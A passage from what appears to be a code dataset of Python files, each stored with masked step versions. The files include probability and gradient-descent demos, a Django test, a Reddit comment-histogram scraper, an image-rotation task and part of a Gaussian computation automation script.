ds_gradient_descent.square_gradient(v)\n next_v = ds_gradient_descent.step(v, gradient, -0.01)\n if ds_algebra.distance(next_v, v) < tolerance:\n print('final resting point: ', v)\n break\n v = next_v\n",
"step-4": "from __future__ import division\nimport random as rnd\nimport math\nfrom collections import Counter\nfrom matplotlib import pyplot as plt\nimport ds_library\nimport ds_algebra\nimport ds_probability\nimport ds_gradient_descent\n\n\ndef normal_pdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals pdfs')\n plt.show()\n\n\ndef normal_cdfs_visualization():\n xs = [(x / 10.0) for x in range(-50, 50)]\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=1) for x in xs], '-',\n label='mu=0-sigma=1')\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=2) for x in xs], '--',\n label='mu=0-sigma=2')\n plt.plot(xs, [ds_probability.normal_cdf(x, sigma=0.5) for x in xs], ':',\n label='mu=0-sigma=0.5')\n plt.plot(xs, [ds_probability.normal_cdf(x, mu=-1) for x in xs], '-.',\n label='mu=-1-sigma=1')\n plt.legend()\n plt.title('Various Normals cdfs')\n plt.show()\n\n\ndef random_kid():\n return rnd.choice(['boy', 'girl'])\n\n\ndef girl_probability():\n both_g = 0\n older_g = 0\n either_g = 0\n for _ in range(10000):\n younger = random_kid()\n older = random_kid()\n if older == 'girl':\n older_g += 1\n if older == 'girl' and younger == 'girl':\n both_g += 1\n if older == 'girl' or younger == 'girl':\n either_g += 1\n print('P(both/older): ', both_g / older_g)\n print('P(both/either): ', both_g / either_g)\n\n\ndef compare_binomial_dist_to_normal_approx(p, n, nb_points):\n data = [ds_probability.binomial(n, p) for _ in range(nb_points)]\n histogram = Counter(data)\n plt.bar([(x - 0.4) for x in histogram.keys()], [(v / nb_points) for v in\n histogram.values()], 0.8, color='0.7')\n mu_px = p * n\n sigma_px = math.sqrt(n * p * (1 - p))\n xs = range(min(data), max(data) + 1)\n ys = [(ds_probability.normal_cdf(i + 0.5, mu_px, sigma_px) -\n ds_probability.normal_cdf(i - 0.5, mu_px, sigma_px)) for i in xs]\n plt.plot(xs, ys)\n plt.title('Binomial Dist vs Normal approximation')\n plt.show()\n\n\nif __name__ == '__main__':\n v = [rnd.randint(-100, 100) for _ in range(3)]\n tolerance = 1e-06\n while True:\n gradient = ds_gradient_descent.square_gradient(v)\n next_v = ds_gradient_descent.step(v, gradient, -0.01)\n if ds_algebra.distance(next_v, v) < tolerance:\n print('final resting point: ', v)\n break\n v = next_v\n",
"step-5": "from __future__ import division\r\nimport random as rnd\r\nimport math\r\nfrom collections import Counter\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nimport ds_library\r\nimport ds_algebra\r\nimport ds_probability\r\nimport ds_gradient_descent\r\n\r\ndef normal_pdfs_visualization():\r\n\txs = [x/10.0 for x in range(-50, 50)]\r\n\tplt.plot(xs, [ds_probability.normal_pdf(x, sigma=1) for x in xs], '-', label='mu=0-sigma=1')\r\n\tplt.plot(xs, [ds_probability.normal_pdf(x, sigma=2) for x in xs], '--', label='mu=0-sigma=2')\r\n\tplt.plot(xs, [ds_probability.normal_pdf(x, sigma=0.5) for x in xs], ':', label='mu=0-sigma=0.5')\r\n\tplt.plot(xs, [ds_probability.normal_pdf(x, mu=-1) for x in xs], '-.', label='mu=-1-sigma=1')\r\n\tplt.legend()\r\n\tplt.title('Various Normals pdfs')\r\n\tplt.show()\r\n\t\r\ndef normal_cdfs_visualization():\r\n\txs = [x/10.0 for x in range(-50, 50)]\r\n\tplt.plot(xs, [ds_probability.normal_cdf(x, sigma=1) for x in xs], '-', label='mu=0-sigma=1')\r\n\tplt.plot(xs, [ds_probability.normal_cdf(x, sigma=2) for x in xs], '--', label='mu=0-sigma=2')\r\n\tplt.plot(xs, [ds_probability.normal_cdf(x, sigma=0.5) for x in xs], ':', label='mu=0-sigma=0.5')\r\n\tplt.plot(xs, [ds_probability.normal_cdf(x, mu=-1) for x in xs], '-.', label='mu=-1-sigma=1')\r\n\tplt.legend()\r\n\tplt.title('Various Normals cdfs')\r\n\tplt.show()\r\n\r\n\r\n\r\ndef random_kid():\r\n return rnd.choice(['boy', 'girl'])\r\ndef girl_probability():\r\n\tboth_g = 0\r\n\tolder_g = 0\r\n\teither_g = 0\r\n\r\n\tfor _ in range(10000):\r\n\t\tyounger = random_kid()\r\n\t\tolder = random_kid()\r\n\r\n\t\tif older == 'girl':\r\n\t\t\tolder_g += 1\r\n\t\tif older == 'girl' and younger == 'girl':\r\n\t\t\tboth_g += 1\r\n\t\tif older == 'girl' or younger == 'girl':\r\n\t\t\teither_g += 1\r\n\tprint(\"P(both/older): \", both_g/older_g)\r\n\tprint(\"P(both/either): \", both_g/either_g)\r\n\r\ndef compare_binomial_dist_to_normal_approx(p, n, nb_points):\r\n\tdata = [ds_probability.binomial(n, p) for _ in range(nb_points)]\r\n\t#showing actual binomial samples on bar chart\r\n\thistogram = Counter(data)\r\n\tplt.bar([x - 0.4 for x in histogram.keys()],\r\n\t\t\t[v / nb_points for v in histogram.values()],\r\n\t\t\t0.8, color='0.7')\r\n\r\n\tmu_px = p * n\r\n\tsigma_px = math.sqrt(n*p*(1 - p))\r\n\r\n\t#line chart that shows the normal approximation of the binomial variable\r\n\txs = range(min(data), max(data)+1)\r\n\tys = [ds_probability.normal_cdf(i+0.5, mu_px, sigma_px) - ds_probability.normal_cdf(i-0.5, mu_px, sigma_px) for i in xs]\r\n\r\n\tplt.plot(xs, ys)\r\n\tplt.title('Binomial Dist vs Normal approximation')\r\n\tplt.show()\r\n\r\nif __name__ == '__main__':\r\n\t# print('5/2: ' + str(5/2))\r\n\t# print('5//2: ' + str(5//2))\r\n\r\n\t# A=[[1,2,3], [1,1,1], [2,2,3]]\r\n\t# print(ds_algebra.get_col(A,1))\r\n\r\n\t# girl_probability()\r\n\r\n\t#normal_cdfs_visualization()\r\n\r\n\t# print(ds_probability.inverse_normal_cdf(0.98))\r\n\r\n\t# compare_binomial_dist_to_normal_approx(0.75, 100, 100000)\r\n\r\n\t#Gradient Descent example\r\n\t#random starting point \r\n\tv = [rnd.randint(-100, 100) for _ in range(3)]\r\n\ttolerance = 0.000001\r\n\r\n\twhile True:\r\n\t\tgradient = ds_gradient_descent.square_gradient(v)\r\n\t\tnext_v = ds_gradient_descent.step(v, gradient, -0.01)\r\n\t\tif ds_algebra.distance(next_v, v) < tolerance:\r\n\t\t\tprint('final resting point: ', v)\r\n\t\t\tbreak\r\n\r\n\t\tv = next_v\r\n",
"step-ids": [
3,
4,
6,
7,
8
]
}
|
[
3,
4,
6,
7,
8
] |
from django.shortcuts import resolve_url as r
from django.test import TestCase
class coreGetHome(TestCase):
def setUp(self):
self.resp = self.client.get(r('core:core_home'))
def test_template_home(self):
self.assertTemplateUsed(self.resp, 'index.html')
def test_200_template_home(self):
self.assertEqual(200, self.resp.status_code)
|
normal
|
{
"blob_id": "d20e41dd7054ff133be264bebf13e4e218710ae5",
"index": 933,
"step-1": "<mask token>\n\n\nclass coreGetHome(TestCase):\n <mask token>\n <mask token>\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-2": "<mask token>\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n <mask token>\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-3": "<mask token>\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n\n def test_template_home(self):\n self.assertTemplateUsed(self.resp, 'index.html')\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-4": "from django.shortcuts import resolve_url as r\nfrom django.test import TestCase\n\n\nclass coreGetHome(TestCase):\n\n def setUp(self):\n self.resp = self.client.get(r('core:core_home'))\n\n def test_template_home(self):\n self.assertTemplateUsed(self.resp, 'index.html')\n\n def test_200_template_home(self):\n self.assertEqual(200, self.resp.status_code)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
import praw
import pickle
import copy
class histogram:
def __init__(self, dictionary=None):
self.frequencies = {}
if dictionary is not None:
self.frequencies = copy.deepcopy(dictionary)
def get_sum(self):
the_sum = 0
for e in self.frequencies:
the_sum += self.frequencies[e]
return the_sum
def add_frequency(self, key, value):
if key in self.frequencies:
self.frequencies[key] += value
else:
self.frequencies[key] = value
def add_by_frequencies(self,frequencies):
for key in frequencies.frequencies:
self.add_frequency(key, frequencies.frequencies[key])
def multiply_frequency(self, key, value):
if key in self.frequencies:
self.frequencies[key] *= value
else:
self.frequencies[key] = 0.0
def multiply_by_frequencies(self, frequencies):
for key in frequencies.frequencies:
self.multiply_frequency(key, frequencies.frequencies[key])
def multiply_by_scalar(self, scalar):
for key in self.frequencies:
self.multiply_frequency(key,scalar)
def divide_frequency(self, key, value):
if key in self.frequencies:
if value != 0:
if self.frequencies[key] == 0:
self.frequencies[key] = 1.0
else:
self.frequencies[key] /= (0.0 + value)
else:
if self.frequencies[key] == 0:
self.frequencies[key] = 1.0
else:
self.frequencies[key] = float('inf')
else:
if value > 0:
self.frequencies[key] = 0.0
else:
self.frequencies[key] = 1.0
def divide_by_frequencies(self, frequencies):
for key in frequencies.frequencies:
self.divide_frequency(key, frequencies.frequencies[key])
class comment:
def __init__(self, comment):
if comment is not None and hasattr(comment,'author') and comment.author is not None and hasattr(comment.author, 'name'):
self.author_name = comment.author.name
else:
self.author_name = ''
self.subreddit = str(comment.subreddit.display_name.strip(' ').lower())
class user:
@staticmethod
def get_histogram(comments, author_name):
total_comments_by_author = 0
the_histogram = histogram()
for comment in comments:
if comment.author_name == author_name:
total_comments_by_author += 1
the_histogram.add_frequency(comment.subreddit, 1)
the_histogram.multiply_by_scalar(1.0 / total_comments_by_author)
#print author_name, " ", the_histogram.get_sum()
return the_histogram.frequencies
class community:
@staticmethod
def get_histogram(comments, subreddit_name):
total_comments_in_subreddit = 0
the_histogram = histogram()
for comment in comments:
if comment.subreddit == subreddit_name:
total_comments_in_subreddit += 1
the_histogram.add_frequency(comment.author_name, 1)
the_histogram.multiply_by_scalar(1.0 / total_comments_in_subreddit)
return the_histogram.frequencies
class data:
def __init__(self, comments, x_subs):
self.comments = comments
self.x_subs = x_subs
def remove_sub_data(subredditName):
the_data = pickle.load(open('data.pkl', 'rb'))
comments = the_data.comments
x_subs = the_data.x_subs
comments = [x for x in comments if x.subreddit.lower() != subredditName]
x_subs = [x for x in x_subs if x != subredditName]
the_data = data(comments, x_subs )
print x_subs
output = open('data.pkl', 'wb')
pickle.dump(the_data,output)
output.close()
def add_sub_data(subredditName, num_redditors):
user_agent = ("Testing Reddit Functionality by /u/Reddit_Projector https://github.com/joshlemer/RedditProject")
reddit = praw.Reddit(user_agent)
subreddit_object = reddit.get_subreddit(subredditName)
the_data = pickle.load(open('data.pkl', 'rb'))
comments = the_data.comments
x_subs = the_data.x_subs
y_comments = [comment(a) for a in subreddit_object.get_comments(limit=num_redditors)]
z_comments = []
redditors = []
i = 0
for y_com in y_comments:
print y_com.subreddit, " z = ", i
redditor = y_com.author_name
if redditor not in redditors:
try:
z_comments += [comment(a) for a in reddit.get_redditor(y_com.author_name).get_comments(limit=100)]
redditors.append(redditor)
except:
print "oops, that user is weird"
i += 1
comments += list(z_comments)
print "COMMENTS LENGTH: ", len(comments)
the_data = data(comments, x_subs + [subredditName] )
output = open('data.pkl', 'wb')
pickle.dump(the_data,output)
output.close()
if __name__ == "__main__":
user_agent = ("Testing Reddit Functionality by /u/Reddit_Projector https://github.com/joshlemer/RedditProject")
reddit = praw.Reddit(user_agent)
subredditName = 'all'
subreddit_object = reddit.get_subreddit(subredditName)
y = 5 #Comments per subreddit inspected
z = 100 #Comments per user inspected
#List of subreddits to be analyzed
# x_subs = [
# 'hiphopheads',
# 'metal',
# 'postrock',
# 'letstalkmusic' ]
#Commented code below is for pulling our x_subs from the most recent comments in /r/all
# x_comments = [comment(a) for a in subreddit_object.get_comments(limit=x)]
# i = 0
# for c in x_comments:
# print "x = ", i
# if c.subreddit not in x_subs:
# x_subs.append(c.subreddit)
# i += 1
#List of subreddits to be analyzed
x_subs = [
'hiphopheads',
'metal',
'postrock',
'letstalkmusic' ]
y_comments = []
i = 0
print "Getting ", y, " comments from each of the ", len(x_subs), " subreddits"
for x_sub in x_subs:
print "\tRetrieving ", 5, " comments from /r/", x_sub
subreddit_object = reddit.get_subreddit(x_sub)
y_comments += [comment(a) for a in subreddit_object.get_comments(limit=y)]
i += 1
z_comments = []
redditors = []
i = 0
print "Following commenters from original subs to gather their other reddit activity"
for y_com in y_comments:
redditor = y_com.author_name
print "\tAnalyzing user ", redditor, " (user ", i, "/", len(y_comments), ")"
if redditor not in redditors:
try:
z_comments += [comment(a) for a in reddit.get_redditor(y_com.author_name).get_comments(limit=z)]
redditors.append(redditor)
except:
print "\t\toops, that user is weird\n\t\tprobably deleted their comment or profile or something"
else:
print "\t\tAlready looked at this user, no need to make an other call."
i += 1
comments = list(z_comments)
print "COMMENTS LENGTH: ", len(comments)
the_data = data(comments, x_subs)
output = open('data.pkl', 'wb')
pickle.dump(the_data,output)
output.close()
|
normal
|
{
"blob_id": "f135d52e4d5e49f96869c4209b84f30ff72f6780",
"index": 876,
"step-1": "import praw\nimport pickle\nimport copy\n\nclass histogram:\n def __init__(self, dictionary=None):\n self.frequencies = {}\n if dictionary is not None:\n self.frequencies = copy.deepcopy(dictionary)\n\n def get_sum(self):\n the_sum = 0\n for e in self.frequencies:\n the_sum += self.frequencies[e]\n return the_sum\n\n def add_frequency(self, key, value):\n if key in self.frequencies:\n self.frequencies[key] += value\n else:\n self.frequencies[key] = value\n\n def add_by_frequencies(self,frequencies):\n for key in frequencies.frequencies:\n self.add_frequency(key, frequencies.frequencies[key])\n\n def multiply_frequency(self, key, value):\n if key in self.frequencies:\n self.frequencies[key] *= value\n else:\n self.frequencies[key] = 0.0\n\n def multiply_by_frequencies(self, frequencies):\n for key in frequencies.frequencies:\n self.multiply_frequency(key, frequencies.frequencies[key])\n\n def multiply_by_scalar(self, scalar):\n for key in self.frequencies:\n self.multiply_frequency(key,scalar)\n\n def divide_frequency(self, key, value):\n if key in self.frequencies:\n if value != 0:\n if self.frequencies[key] == 0:\n self.frequencies[key] = 1.0\n else:\n self.frequencies[key] /= (0.0 + value)\n else:\n if self.frequencies[key] == 0:\n self.frequencies[key] = 1.0\n else:\n self.frequencies[key] = float('inf')\n else:\n if value > 0:\n self.frequencies[key] = 0.0\n else:\n self.frequencies[key] = 1.0\n\n def divide_by_frequencies(self, frequencies):\n for key in frequencies.frequencies:\n self.divide_frequency(key, frequencies.frequencies[key])\n\n\nclass comment:\n def __init__(self, comment):\n if comment is not None and hasattr(comment,'author') and comment.author is not None and hasattr(comment.author, 'name'):\n self.author_name = comment.author.name\n else:\n self.author_name = ''\n\n self.subreddit = str(comment.subreddit.display_name.strip(' ').lower())\n\nclass user:\n @staticmethod\n def get_histogram(comments, author_name):\n total_comments_by_author = 0\n the_histogram = histogram()\n for comment in comments:\n if comment.author_name == author_name:\n total_comments_by_author += 1\n the_histogram.add_frequency(comment.subreddit, 1)\n the_histogram.multiply_by_scalar(1.0 / total_comments_by_author)\n #print author_name, \" \", the_histogram.get_sum()\n return the_histogram.frequencies\n\nclass community:\n @staticmethod\n def get_histogram(comments, subreddit_name):\n total_comments_in_subreddit = 0\n the_histogram = histogram()\n for comment in comments:\n if comment.subreddit == subreddit_name:\n total_comments_in_subreddit += 1\n the_histogram.add_frequency(comment.author_name, 1)\n the_histogram.multiply_by_scalar(1.0 / total_comments_in_subreddit)\n return the_histogram.frequencies\n\nclass data:\n def __init__(self, comments, x_subs):\n self.comments = comments\n self.x_subs = x_subs\n\n\ndef remove_sub_data(subredditName):\n the_data = pickle.load(open('data.pkl', 'rb'))\n comments = the_data.comments\n x_subs = the_data.x_subs\n\n comments = [x for x in comments if x.subreddit.lower() != subredditName]\n x_subs = [x for x in x_subs if x != subredditName]\n\n the_data = data(comments, x_subs )\n print x_subs\n output = open('data.pkl', 'wb')\n pickle.dump(the_data,output)\n output.close()\n\n\n\n\ndef add_sub_data(subredditName, num_redditors):\n user_agent = (\"Testing Reddit Functionality by /u/Reddit_Projector https://github.com/joshlemer/RedditProject\")\n reddit = praw.Reddit(user_agent)\n subreddit_object = reddit.get_subreddit(subredditName)\n\n the_data = pickle.load(open('data.pkl', 'rb'))\n comments = the_data.comments\n x_subs = the_data.x_subs\n y_comments = [comment(a) for a in subreddit_object.get_comments(limit=num_redditors)]\n\n z_comments = []\n redditors = []\n i = 0\n for y_com in y_comments:\n print y_com.subreddit, \" z = \", i\n redditor = y_com.author_name\n if redditor not in redditors:\n try:\n z_comments += [comment(a) for a in reddit.get_redditor(y_com.author_name).get_comments(limit=100)]\n redditors.append(redditor)\n except:\n print \"oops, that user is weird\"\n i += 1\n\n comments += list(z_comments)\n print \"COMMENTS LENGTH: \", len(comments)\n the_data = data(comments, x_subs + [subredditName] )\n output = open('data.pkl', 'wb')\n pickle.dump(the_data,output)\n output.close()\n\n\n\nif __name__ == \"__main__\":\n user_agent = (\"Testing Reddit Functionality by /u/Reddit_Projector https://github.com/joshlemer/RedditProject\")\n reddit = praw.Reddit(user_agent)\n subredditName = 'all'\n subreddit_object = reddit.get_subreddit(subredditName)\n y = 5 #Comments per subreddit inspected\n z = 100 #Comments per user inspected\n\n\n\n #List of subreddits to be analyzed\n # x_subs = [\n # 'hiphopheads',\n # 'metal',\n # 'postrock',\n # 'letstalkmusic' ]\n\n #Commented code below is for pulling our x_subs from the most recent comments in /r/all\n\n # x_comments = [comment(a) for a in subreddit_object.get_comments(limit=x)]\n # i = 0\n # for c in x_comments:\n # print \"x = \", i\n # if c.subreddit not in x_subs:\n # x_subs.append(c.subreddit)\n # i += 1\n\n #List of subreddits to be analyzed\n x_subs = [\n 'hiphopheads',\n 'metal',\n 'postrock',\n 'letstalkmusic' ]\n\n y_comments = []\n i = 0\n print \"Getting \", y, \" comments from each of the \", len(x_subs), \" subreddits\"\n for x_sub in x_subs:\n print \"\\tRetrieving \", 5, \" comments from /r/\", x_sub\n subreddit_object = reddit.get_subreddit(x_sub)\n y_comments += [comment(a) for a in subreddit_object.get_comments(limit=y)]\n i += 1\n\n z_comments = []\n redditors = []\n i = 0\n print \"Following commenters from original subs to gather their other reddit activity\"\n for y_com in y_comments:\n redditor = y_com.author_name\n print \"\\tAnalyzing user \", redditor, \" (user \", i, \"/\", len(y_comments), \")\"\n if redditor not in redditors:\n try:\n z_comments += [comment(a) for a in reddit.get_redditor(y_com.author_name).get_comments(limit=z)]\n redditors.append(redditor)\n except:\n print \"\\t\\toops, that user is weird\\n\\t\\tprobably deleted their comment or profile or something\"\n else:\n print \"\\t\\tAlready looked at this user, no need to make an other call.\"\n i += 1\n\n comments = list(z_comments)\n print \"COMMENTS LENGTH: \", len(comments)\n the_data = data(comments, x_subs)\n output = open('data.pkl', 'wb')\n pickle.dump(the_data,output)\n output.close()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# Error using ncdump - NetCDF4 Python
ncdump -h filename
|
normal
|
{
"blob_id": "12f0eeeb81fe611d88e33fd2e8df407e289fb582",
"index": 1255,
"step-1": "# Error using ncdump - NetCDF4 Python\nncdump -h filename\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
try:
import Image
except ImportError:
from PIL import Image
import sys
sys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, 'DropPy.Common')))
from file_tools import get_file_paths_from_directory
class Task(object):
"""
Documentation: https://docs.droppyapp.com/tasks/image-rotate
"""
def __init__(self, input_dir, output_dir, **kwargs):
# Get keyword arguments.
degrees = kwargs.get(str('degrees'), 90.0)
expand_arg = kwargs.get(str('expand'), True)
# Check arguments.
if expand_arg is True:
expand = 1
elif expand_arg is False:
expand = 0
else:
sys.exit('Argument expand invalid')
# Process files and directories.
for item_name in os.listdir(input_dir):
item_path = os.path.join(input_dir, item_name)
if os.path.isfile(item_path):
self.rotate_file(item_path, output_dir, degrees, expand)
elif os.path.isdir(item_path):
output_sub_dir = os.path.join(output_dir, item_name)
os.makedirs(output_sub_dir)
contained_files = get_file_paths_from_directory(item_path)
for contained_file in contained_files:
self.rotate_file(contained_file, output_sub_dir, degrees, expand)
@staticmethod
def rotate_file(input_file, output_dir, degrees, expand):
output_file_name = os.path.basename(input_file)
output_file = os.path.join(output_dir, output_file_name)
input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
|
normal
|
{
"blob_id": "df3208a00f7a5dd1ddd76542ac0de85762cc45ab",
"index": 7236,
"step-1": "<mask token>\n\n\nclass Task(object):\n <mask token>\n <mask token>\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-2": "<mask token>\n\n\nclass Task(object):\n <mask token>\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-3": "<mask token>\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-4": "from __future__ import unicode_literals\nimport os\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\nimport sys\nsys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,\n 'DropPy.Common')))\nfrom file_tools import get_file_paths_from_directory\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nimport os\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\nimport sys\n\nsys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, 'DropPy.Common')))\nfrom file_tools import get_file_paths_from_directory\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n def __init__(self, input_dir, output_dir, **kwargs):\n # Get keyword arguments.\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n\n # Check arguments.\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n\n # Process files and directories.\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir, degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-ids": [
2,
3,
4,
6,
7
]
}
|
[
2,
3,
4,
6,
7
] |
import os
import pandas as pd
import time
import sys
from tqdm import tqdm
sys.path.append(os.path.join(os.environ['HOME'],'Working/interaction/'))
from src.make import exec_gjf
from src.vdw import vdw_R, get_c_vec_vdw
from src.utils import get_E
import argparse
import numpy as np
from scipy import signal
import scipy.spatial.distance as distance
import random
def init_process(args):
auto_dir = args.auto_dir
monomer_name = args.monomer_name
os.makedirs(os.path.join(auto_dir,'gaussian'), exist_ok=True)
os.makedirs(os.path.join(auto_dir,'gaussview'), exist_ok=True)
def get_init_para_csv(auto_dir,monomer_name):
init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')
df = pd.read_csv('/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'.format(monomer_name))
# df = df[(df["A2"]==30)&(df["A1"]<=0)&(df["A1"]>=-10)&(df["theta"]>45)]
df = df[(df["A2"]==32)&(df["A1"]<=0)&(df["A1"]>=-20)&(df["theta"]>45)]
inner_zip = df[['a','b','theta','A1','A2']].values
print(inner_zip)
init_para_list = []
for a,b,theta,A1,A2 in tqdm(inner_zip):
c = get_c_vec_vdw(monomer_name,A1,A2,a,b,theta)
init_para_list.append([np.round(a,1),np.round(b,1),theta,A1,A2,np.round(c[0],1),np.round(c[1],1),np.round(c[2],1),'NotYet'])
df_init_params = pd.DataFrame(np.array(init_para_list),columns = ['a','b','theta','A1','A2','cx','cy','cz','status'])
df_init_params.to_csv(init_params_csv,index=False)
get_init_para_csv(auto_dir,monomer_name)
auto_csv_path = os.path.join(auto_dir,'step3-twist.csv')
if not os.path.exists(auto_csv_path):
df_E = pd.DataFrame(columns = ['a','b','theta','A1','A2','cx','cy','cz','E','E_p','E_t','machine_type','status','file_name'])
else:
df_E = pd.read_csv(auto_csv_path)
df_E = df_E[df_E['status']!='InProgress']
df_E.to_csv(auto_csv_path,index=False)
df_init=pd.read_csv(os.path.join(auto_dir,'step3-twist_init_params.csv'))
df_init['status']='NotYet'
df_init.to_csv(os.path.join(auto_dir,'step3-twist_init_params.csv'),index=False)
def main_process(args):
os.chdir(os.path.join(args.auto_dir,'gaussian'))
isOver = False
while not(isOver):
#check
isOver = listen(args)
time.sleep(1)
def listen(args):
auto_dir = args.auto_dir
monomer_name = args.monomer_name
num_nodes = args.num_nodes
isTest = args.isTest
fixed_param_keys = ['A1','A2']
opt_param_keys = ['a','b','theta','cx','cy','cz']
auto_step2_csv = '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.format(monomer_name)
df_step2 = pd.read_csv(auto_step2_csv)
auto_csv = os.path.join(auto_dir,'step3-twist.csv')
df_E = pd.read_csv(auto_csv)
df_queue = df_E.loc[df_E['status']=='InProgress',['machine_type','file_name','A1','A2','a','b','theta','cx','cy','cz']]
machine_type_list = df_queue['machine_type'].values.tolist()
len_queue = len(df_queue)
maxnum_machine2 = 3#int(num_nodes/2)
for idx,row in zip(df_queue.index,df_queue.values):
machine_type,file_name,A1,A2,a,b,theta,cx,cy,cz = row
log_filepath = os.path.join(*[auto_dir,'gaussian',file_name])
if not(os.path.exists(log_filepath)):#logファイルが生成される直前だとまずいので
continue
